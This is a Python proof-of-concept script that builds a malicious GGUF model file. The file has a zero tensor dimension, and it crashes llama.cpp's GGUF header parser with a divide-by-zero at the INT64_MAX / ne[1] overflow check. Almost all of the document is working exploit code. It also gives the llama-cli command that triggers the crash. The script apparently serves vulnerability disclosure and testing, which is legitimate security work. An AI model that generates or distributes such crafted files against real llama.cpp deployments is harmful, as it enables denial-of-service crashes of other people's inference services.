File size: 4,357 Bytes
243748f
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
#!/usr/bin/env python3
"""
PoC: Divide-by-zero in llama.cpp GGUF parser via zero tensor dimension.

Vulnerability: In ggml/src/gguf.cpp lines 550-552, the overflow check does:
    if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) || ...))

The dimensions ne[0..3] are validated for < 0 at line 541 but NOT for == 0.
A dimension of 0 passes the < 0 check, then INT64_MAX / 0 triggers
undefined behavior (divide-by-zero crash / SIGFPE on most platforms).

Attack vector:
  - Craft a GGUF file with 1 tensor
  - Tensor has n_dims=2, ne[0]=32 (valid for F32 block size), ne[1]=0
  - ne[2] and ne[3] default to 1 (set at line 535)
  - The parser reads ne[0]=32, ne[1]=0, then at line 550:
      INT64_MAX / info.t.ne[1]  =>  INT64_MAX / 0  =>  CRASH

GGUF v3 binary format for tensor info:
  - name: string (uint64 length + chars)
  - n_dims: uint32
  - ne[0..n_dims-1]: int64 each
  - type: int32 (ggml_type)
  - offset: uint64
"""

import os
import struct
import sys

# GGUF constants (values mirror the gguf_type enum in the llama.cpp sources)
GGUF_MAGIC = b"GGUF"     # 4-byte magic at the very start of every GGUF file
GGUF_VERSION = 3         # header version field; the v3 layout is assumed below
GGUF_TYPE_STRING = 8     # gguf_type tag for string KV values
GGUF_TYPE_UINT32 = 4     # gguf_type tag for uint32 KV values (unused here)

# ggml type constants
GGML_TYPE_F32 = 0        # ggml_type tag: 32-bit float tensor data (block size 1)


def write_string(f, s):
    """Serialize *s* into stream *f* in GGUF string layout.

    Layout: little-endian uint64 byte length, then the raw UTF-8 bytes.
    No null terminator is written.
    """
    payload = s.encode('utf-8')
    length_prefix = struct.pack('<Q', len(payload))
    f.write(length_prefix)
    f.write(payload)


def write_kv_string(f, key, value):
    """Emit one metadata key/value pair whose value is a string.

    Wire layout: key (GGUF string), uint32 value-type tag
    (GGUF_TYPE_STRING), then the value (GGUF string).
    """
    write_string(f, key)
    # Value-type tag precedes the value itself.
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)


def create_divzero_gguf(output_path):
    """Write a malicious GGUF file whose single tensor has ne[1] == 0.

    The zero dimension passes the parser's "< 0" validation and then
    feeds the INT64_MAX / ne[1] overflow check, producing a
    divide-by-zero (see the module docstring for the exact code path).

    :param output_path: filesystem path the crafted .gguf is written to
    """
    n_tensors = 1
    n_kv = 1  # a single general.architecture entry is enough metadata

    with open(output_path, 'wb') as f:
        # --- Header: magic, version, tensor count, KV count ---
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<IQQ', GGUF_VERSION, n_tensors, n_kv))

        # --- KV pairs: just the architecture key ---
        write_kv_string(f, "general.architecture", "llama")

        # --- Tensor info record ---
        write_string(f, "weight")      # tensor name
        f.write(struct.pack('<I', 2))  # n_dims = 2; ne[2], ne[3] default to 1

        # ne[0] = 32 is valid (F32 block size is 1, so any count divides).
        # ne[1] = 0 is the trigger: 0 is not "< 0", so validation passes,
        # and the parser then evaluates INT64_MAX / ne[1] => division by 0.
        f.write(struct.pack('<qq', 32, 0))

        f.write(struct.pack('<i', GGML_TYPE_F32))  # tensor type
        f.write(struct.pack('<Q', 0))              # data offset (never reached)

        # --- Alignment padding ---
        # Pad out to GGUF_DEFAULT_ALIGNMENT (32) so the parser does not hit
        # a premature EOF before reaching the vulnerable check. No actual
        # tensor data is needed: the crash happens during header parsing.
        pad = (-f.tell()) % 32
        f.write(b'\x00' * pad)

    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    print(f"[*] Tensor: name='weight', n_dims=2, ne=[32, 0, 1, 1], type=F32")
    print(f"[*] Vulnerability: INT64_MAX / ne[1] = INT64_MAX / 0 => divide-by-zero")
    print(f"[*]")
    print(f"[*] Test with:")
    print(f"[*]   ./llama-cli -m {output_path} -p 'hello'")
    print(f"[*] Expected: Floating point exception (SIGFPE) or crash")


if __name__ == "__main__":
    # Fix: the original hard-coded an absolute path inside one developer's
    # home directory, making the script fail for everyone else. Accept an
    # optional output path on the command line and default to a relative
    # location under the current working directory.
    default_path = os.path.join("gguf_poc", "poc_divzero.gguf")
    output_path = sys.argv[1] if len(sys.argv) > 1 else default_path
    out_dir = os.path.dirname(output_path)
    if out_dir:  # skip makedirs for a bare filename in the cwd
        os.makedirs(out_dir, exist_ok=True)
    create_divzero_gguf(output_path)